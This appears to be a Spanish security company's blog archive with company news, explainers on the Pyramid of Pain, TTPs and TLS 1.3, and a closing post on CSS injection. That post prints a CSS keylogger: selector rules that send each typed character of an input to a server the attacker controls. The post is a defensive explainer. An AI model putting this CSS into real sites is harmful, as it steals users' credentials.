Zerolynx recibe el premio #RevistaSIC en los #XVPremiosSIC por su innovación en ciberseguridad



El pasado miércoles 25 de Abril tuvo lugar la XV edición de los premios que otorga la revista SIC anualmente a empresas y personas referentes en el sector de la ciberseguridad. Como cada año, el evento gozó de un gran éxito con una importante afluencia de representantes de las empresas más destacables españolas.


Fuente de la imagen: Revista SIC

Este año tuvimos el honor en Zerolynx de recibir uno de los premios otorgados en la edición de este 2018 por nuestra innovación en ciberseguridad. El premio fue recogido por nuestro Director General, Juan Antonio Calles y por nuestro Director de Operaciones, Daniel González.


Fuente de la imagen: Revista SIC


Es para nosotros un honor recibir este reconocimiento de la Revista Sic premiando nuestro trabajo, confirmando así el buen rumbo de la firma y el feedback tan positivo de nuestros clientes y colaboradores.

¡Gracias!

TTPs y la Pirámide del Dolor

En el anterior artículo hablábamos de la importancia del concepto TTP (Tácticas, Técnicas y Procedimientos) a la hora de evaluar nuestra capacidad de detección y respuesta ante amenazas. En este artículo vamos a ahondar en otro de los motivos por los que la utilización de TTPs es crucial, y no es otro que la famosa Pirámide del Dolor.



La Pirámide del Dolor refleja la relación entre diferentes tipos de indicadores que pueden llegar a utilizarse para detectar a un adversario, frente al potencial daño que denegar dichos indicadores puede provocar a los atacantes. También refleja la dificultad de conseguir dicha inteligencia para poder usarla contra el adversario. 

En el nivel más bajo tenemos los hashes, como por ejemplo podría ser el SHA1 de un conocido fichero malicioso. Como todos sabemos, los hashes nos permiten identificar con total exactitud una muestra concreta pero su utilidad es más bien nula, ya que la modificación del hash de un fichero es trivial. Por tanto, su utilidad para un equipo de detección y respuesta es muy limitada. 

En el siguiente nivel tenemos las direcciones IP. Parecido al anterior concepto, cambiar de dirección IP es prácticamente trivial gracias a Tor, proxies, a la utilización de otros sistemas comprometidos, etc. 

Prácticamente igual de sencillo de modificar son los dominios. El mayor problema está en el registro, pero entre dominios comprometidos, los servicios de DNS dinámico, y otras diversas posibilidades un atacante puede modificar sus dominios con relativa facilidad. 

Un piso más arriba están los artefactos de red y host. Aquí entramos en un terreno que empieza a suponer un reto para los atacantes, ya que es prácticamente imposible realizar una actividad realmente significativa sin dejar rastro en los logs. A nivel de host podríamos hablar de ficheros, entradas de registro, cadenas en memoria, etc., y a nivel de red tenemos ejemplos en cadenas de user-agent concretas, patrones de URI que se repiten, tamaños de petición y/o respuesta, y otros. Muchos de estos elementos se pueden modificar, pero comienzan a ser muchos los parámetros que deben ser tenidos en cuenta para ocultar su presencia en nuestros sistemas y redes. 

Denegar el acceso a herramientas es otro paso más en la pirámide del dolor. Observar una y otra vez la misma herramienta te ayuda a generar reglas que te permiten detectarla, aunque el atacante intente realizar cambios sobre ella, modificando su hash e incluso eliminando las firmas para tu propio antivirus. En última instancia, forzamos al atacante a investigar nuevas herramientas o desarrollar una nueva. 

Finalmente, arriba del todo de la pirámide están las Tácticas, Técnicas y Procedimientos. Como hablamos en nuestra anterior entrada, a este nivel estamos definiendo a alto nivel el comportamiento del adversario. Cuando nuestra capacidad y respuesta está a este nivel, hemos sobrepasado el nivel de las herramientas. Como sabemos que el atacante utiliza técnicas de Pass-The-Hash, ya no detectamos herramientas concretas, sino que impedimos por completo el uso de esta técnica y la detectamos de forma automatizada. Ya no nos interesa si el atacante utiliza una muestra de Mimikatz con un hash u otro, si ejecuta Mimikatz en memoria con Powershell, o una herramienta propia que él mismo ha creado. Ahora somos capaces de detectar que un proceso no identificado y no firmado digitalmente por Microsoft ha interactuado con el proceso lsass.exe de una forma no esperada. 

Como vemos, cuanto más alto estemos en la Pirámide del Dolor, más efectivas serán nuestras medidas de cara a crear un entorno altamente hostil para el atacante.

Threat Emulation y TTPs

Una parte crucial de la Simulación de Adversarios en ciberseguridad es la utilización de TTP’s que usan los actores maliciosos reales. 

El concepto de TTP origina en la doctrina militar, y es acrónico de Tácticas, Técnicas y Procedimientos. Sin entrar en una descripción concreta de cada uno de los términos, sí que es importante entender a alto nivel dos conceptos clave:

  • Las TTP sirven para caracterizar el modus operandi de un determinado adversario en el plano cyber, y para ello, describen qué es lo que hace y cómo lo hace. 
  • Todos son descriptivos en su naturaleza, pero el nivel de especificación aumenta progresivamente. Así, las Tácticas son menos específicas que las Técnicas, y estas a su vez son menos específicas que los Procedimientos. En cierto modo, se comportan como una pirámide en la que cada nivel sirve para soportar al que tiene justo encima de él. 



Por ejemplo, una Táctica podría ser la obtención de un acceso inicial a la organización sin explotación de vulnerabilidades. Como vemos, es un concepto bastante genérico. Bajando un poco de nivel nos encontraríamos las Técnicas, que describen métodos de conseguir ese objetivo. En nuestro ejemplo, una técnica podría ser el uso de ataques de Spearphishing. Finalmente nos encontramos con los Procedimientos, que describen cómo el actor malicioso realiza la técnica paso a paso. Por ejemplo, el procedimiento podría ser recopilar información del sujeto a atacar, registrar un dominio parecido al de la organización, y mandar un email incluyendo un enlace que lleva a un clon de un portal corporativo con el objetivo de robar credenciales en claro que posteriormente se usarán para el acceso a la organización. 

Una parte esencial de la Simulación de Adversarios consiste en replicar con la mayor precisión posible a un actor malicioso concreto, y esto nos fuerza a conocer sus TTPs y nos restringe dentro de ese comportamiento. Utilizando estos conceptos podemos simular amenazas avanzadas dentro de nuestra organización y evaluar nuestras capacidades de detección y respuesta

En próximas entradas haremos hincapié en otro motivo por el cual es tan importante hacer uso de TTPs para afinar nuestros procedimientos de detección y respuesta ante amenazas.

Zerolynx incorpora a Diego León como nuevo responsable del área de Seguridad Ofensiva


Continuando con nuestra política de crecimiento y con el objetivo de reforzar nuestras capacidades técnicas, hoy damos la bienvenida a nuestro equipo a Diego León, quien se incorpora como  nuevo responsable del área de seguridad ofensiva de ZeroLynx

Diego cuenta con una destacable capacitación técnica en seguridad. Es ingeniero informático, cuenta con un master de postgrado en ciberseguridad y sendas certificaciones relacionadas con el hacking ético. Cuenta además con una dilatada experiencia en compañías de índole internacional como PwC, KPMG y GMV, donde ha participado en numerosos proyectos relacionados con la seguridad ofensiva y defensiva. 

Como responsable del área de seguridad ofensiva, Diego se encargará de coordinar los equipos de pentesting y red teaming, reforzando la capacidad de ZeroLynx para ofertar servicios disruptores de seguridad ofensiva, como la simulación avanzada de adversarios en los entornos de nuestros clientes. A través del uso de tácticas, técnicas y procedimientos reales que los actores maliciosos actuales utilizan en sus campañas, ayudaremos a evaluar las capacidades de detección y respuesta de cualquier organización. De este modo buscamos ofertar servicios que no sólo permitan evaluar las tecnologías y procesos de seguridad desplegados, sino entrenar al factor humano implicado junto a dichos procesos, ayudando a evaluar la verdadera postura de seguridad de nuestros clientes, acompañándoles en el camino hacia su seguridad.

Participamos en el programa de radio "En la ciberguarida" de Cadena SER


Nuestro CEO Juan Antonio Calles ha participado hoy en el programa de radio "En la ciberguarida" de Cadena SER, en una interesante entrevista llevada a cabo por José Antonio Rubio y Pilar García, acerca del Ransomware y su impacto en particulares y empresas.

Durante 10 minutos, Calles ha dado la visión de Zerolynx sobre los ataques malware basados en ransomware, aportando consejos para protegernos y poder recuperar nuestros datos tras una infección.

El podcast con la entrevista completa puede ser descargado desde el siguiente enlace:

Revista SIC se hace eco del lanzamiento de Zerolynx



La revista SIC, revista de Ciberseguridad, Seguridad de la Información y Privacidad líder en su sector, se ha hecho eco en su nº 129 del lanzamiento de la compañía ZeroLynx.

En el artículo titulado "ZEROLYNX inicia su actividad con la ciberseguridad y la ciberinteligencia como núcleo de negocio", SIC se hace eco de los servicios principales de la compañía, así como de su alta capacitación en las áreas de Red Team y Ciberinteligencia.

Así mismo, en el apartado de nombramientos figura nuestro CEO, Juan Antonio Calles, que el pasado mes de Febrero asumió el rol de Director General de la compañía.

ZeroLynx participa en el III Congreso de Ciberseguridad y Seguros de ICEA

Mañana día 18 de Abril tendrá lugar el III Congreso de Ciberseguridad y Seguros que organiza la asociación ICEA.

El Congreso se celebrará en el Hotel Ilunion Pío XII - Salón Auditorio (Avenida Pío XII, 77 - Madrid) y es totalmente gratuito para entidades aseguradoras.

Daniel González, COO de ZeroLynx, abrirá la sesión de conferencias con la charla "Fortificando el eslabón más débil de la cadena", que tendrá lugar a las 10:00h.

Más adelante, Juan Antonio Calles, CEO de ZeroLynx, impartirá una sesión práctica titulada "¿Es tan fácil caer en manos del enemigo?" donde mostrará a los asistentes algunas de las técnicas utilizadas por los ciberatacantes para hacerse con el control de una empresa, y robar su información.

Más información y registro en: www.icea.es


#ZeroLynx participará en el evento Urjc Techfest


El próximo 20 de Abril, Daniel González, COO de ZeroLynx, participará en el congreso URJC Techfest con una interesante conferencia sobre Open Source Intelligence (OSINT).

En el evento, que tendrá lugar en las instalaciones de Móstoles de la Universidad Rey Juan Carlos, participarán otros expertos del mundo de la ciberseguridad, como Josep Albors, Head of Awareness and Research de ESET, y Pablo González, Technical Manager & Security de Telefónica Digital.

Para más información y registro puedes acceder al sitio web oficial del evento a través del siguiente enlace: 

TLS 1.3: más seguridad y velocidad en nuestras conexiones


El pasado 21 de marzo el Internet Engineering Task Force (IETF) finalmente publicó el documento que define el estándar TLS 1.3, no sin antes haber pasado por la friolera cantidad de 28 borradores que comenzaron allá por abril del 2014.

Las principales ventajas que trae esta nueva versión son mejoras en la seguridad y en la velocidad.

TLS se publicó por primera vez en 1999 con el objetivo de sustituir a SSL v3.0, aunque la última versión, TLS1.2, se había publicado en 2008. A pesar de tratarse de un sistema generalmente seguro, algunas partes del protocolo han estado relacionadas con diferentes fallos criptográficos. De este modo, cabía la posibilidad de que un administrador configurase de forma incorrecta un servidor exponiendo la información por culpa de posibles vulnerabilidades.

TLS 1.3 sigue la filosofía de reducir al máximo la superficie de ataque, aunque eso suponga reducir la compatibilidad con viejos métodos criptográficos que han demostrado ser inseguros. Por este motivo los errores de configuración dejan de tener cabida, facilitando así la vida al administrador que ya no tiene que preocuparse por qué funciones desactivar. Algunas de las funcionalidades presentes en TLS 1.2 que han sido eliminadas en el último estándar son:

  • RSA Key Transport, por no ser compatible con forward secrecy.
  • Cifradores en modo CBC, relacionadas con los ataques BEAST y Lucky 13.
  • RC4, que no se considera seguro para uso en HTTPs.
  • La función de hash SHA-1, sustituida por SHA-2.
  • Grupos arbitrarios de Diffie-Helman, relacionadas con la vulnerabilidad CVE-2016-0701.
  • Cifrados de “grado de exportación”, responsables de los ataques FREAK y LogJam.
 
Si quieres comprobar si la configuración de cifrado de tu servidor es segura, te recomendamos usar el SSL Server Test de Qualys SSL Labs, o cualquiera de las múltiples herramientas de línea de comandos disponibles, como puedan ser sslcan, sslyze, o tlssled.

La velocidad también se ha visto mejorada gracias a la eliminación de características legacy presentes en TLS 1.2. Así, anteriormente eran necesarios dos round-trips para realizar un handshake completo, mientras que ahora es posible realizar la misma función en un único round-trip.

Fuente: Cloudflare.com 


Además, se ha introducido el modo 0-RTT o zero round trip, que permite mandar datos cifrados al servidor en el primer mensaje cuando dicho servidor se ha visitado recientemente. Todas estas características se resumen en una reducción en la latencia y por tanto en un incremento de la velocidad de carga de las páginas web.

Si quieres saber si TLS 1.3 está soportado por tu navegador, sólo tienes que acceder al siguiente enlace. De momento, las buenas noticias son principalmente para los usuarios de Firefox y Chrome, pero no así para aquellos usuarios que utilizan Internet Explorer, Edge o Safari.

Keylogger CSS: robando credenciales a través de CSS

En los últimos años las medidas de seguridad de los sitios web han mejorado exponencialmente, gracias al uso de frameworks que permiten automatizar la codificación, evitando así fallos humanos durante los procesos de desarrollo. Metodologías como OpenSAMM también han puesto su granito de arena para mejorar la seguridad global de las aplicaciones web, pero las posibles brechas que pueden presentarse en estos entornos son muchas, y en multitud de ocasiones, desconocidas.

En los procesos de hacking ético sobre aplicaciones web en los que participamos desde ZeroLynx, nos encontramos habitualmente una gran variedad de inyecciones de código (sql, xss, commands, etc.), pero una de ellas siempre nos ha resultado curiosa por encima de las demás, las inyecciones CSS. Aunque en muchas metodologías de auditoría no están representadas como un tipo concreto, suelen identificarse en sitios web desarrollados bajo frameworks como Liferay, Joomla y similar, por descuidos de los maquetadores que de alguna u otra manera dejan expuesto algún lugar (como un input) donde poder alterar los CSS del sitio web. Es en casos concretos como este donde un atacante puede disfrutar de su ingenio para desarrollar un exploit con el que poder sustraer datos críticos.

Recientemente, Max Chehab, de la universidad de Gonzaga, publicaba en su cuenta de Github un interesante Keylogger desarrollado en CSS, con el que poder sustraer las credenciales de un sitio web. Podéis descargar la prueba de concepto a continuación:


La explotación funciona debido a que la página que propone Chehab utiliza frameworks como React.js -  https://reactjs.org 

React sincroniza los valores que están siendo introducidos por los usuarios en un <input>, por ejemplo, cuando introducen unas credenciales de autenticación.

Imaginaros la siguiente porción de código CSS:

input[value$="Z"] {
     background-image: url("http://localhost:3000/Z");
 }

Se trata de un selector de CSS que solo aplica cuando se pulsa la letra "Z". Por otro lado, se establece una imagen inexistente como fondo de pantalla,  haciendo así una petición a una dirección de nuestro control, en la que podríamos tener por ejemplo una API Rest escuchando. Si esto lo ampliamos a todo el abecedario, números y símbolos, tendríamos un "keylogger" funcional recogiendo todas y cada una de las pulsaciones de un usuario. Interesante técnica ¿verdad?


input[value$="Z"] { background-image: url("http://localhost:3000/Z");}

input[value$="e"] { background-image: url("http://localhost:3000/e");}
input[value$="r"] { background-image: url("http://localhost:3000/r");}
input[value$="o"] { background-image: url("http://localhost:3000/o");}
input[value$="L"] { background-image: url("http://localhost:3000/L");}
input[value$="y"] { background-image: url("http://localhost:3000/y");}
input[value$="n"] { background-image: url("http://localhost:3000/n");}
input[value$="x"] { background-image: url("http://localhost:3000/x");}

Por técnicas como esta es especialmente crucial validar los CSS utilizados durante los procesos de desarrollo de nuestras aplicaciones web, sobretodo si provienen de terceros, donde un usuario malintencionado podría dejar keyloggers CSS ocultos para robar credenciales de forma sencilla.